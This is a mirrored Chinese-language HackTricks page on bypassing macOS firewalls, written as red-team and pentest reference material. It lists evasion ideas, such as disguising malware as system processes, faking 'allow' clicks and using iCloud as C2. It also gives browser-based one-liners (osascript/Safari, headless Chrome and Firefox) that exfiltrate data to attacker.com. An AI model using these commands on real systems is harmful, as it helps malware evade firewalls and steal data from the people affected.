mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
4.2 KiB
4.2 KiB
macOS 绕过防火墙
从零开始学习 AWS 黑客技术,成为 htARTE (HackTricks AWS 红队专家)!
支持 HackTricks 的其他方式:
- 如果您想在 HackTricks 中看到您的公司广告或下载 HackTricks 的 PDF,请查看订阅计划!
- 获取官方 PEASS & HackTricks 商品
- 发现PEASS 家族,我们独家的 NFTs 集合
- 加入 💬 Discord 群组 或 telegram 群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享您的黑客技巧。
发现的技术
以下技术在一些 macOS 防火墙应用中被发现有效。
滥用白名单名称
- 例如,将恶意软件命名为众所周知的 macOS 进程名称,如
launchd
。
合成点击
- 如果防火墙向用户请求权限,让恶意软件点击允许
使用苹果签名的二进制文件
- 像
curl
,但也包括其他的,如whois
众所周知的苹果域名
防火墙可能允许连接到众所周知的苹果域名,如 apple.com
或 icloud.com
。并且 iCloud 可以被用作 C2。
通用绕过
一些尝试绕过防火墙的想法
检查允许的流量
了解允许的流量将帮助您识别可能被列入白名单的域名或哪些应用程序被允许访问它们。
lsof -i TCP -sTCP:ESTABLISHED
滥用 DNS
DNS 解析是通过签名应用程序 mdnsreponder
完成的,该程序很可能被允许联系 DNS 服务器。
通过浏览器应用
- osascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- 谷歌浏览器
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
通过进程注入
如果你能够注入代码到一个允许连接任何服务器的进程中,你可以绕过防火墙保护:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
参考资料
通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击!
支持HackTricks的其他方式:
- 如果你想在HackTricks中看到你的公司广告或者下载HackTricks的PDF版本,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享你的黑客技巧。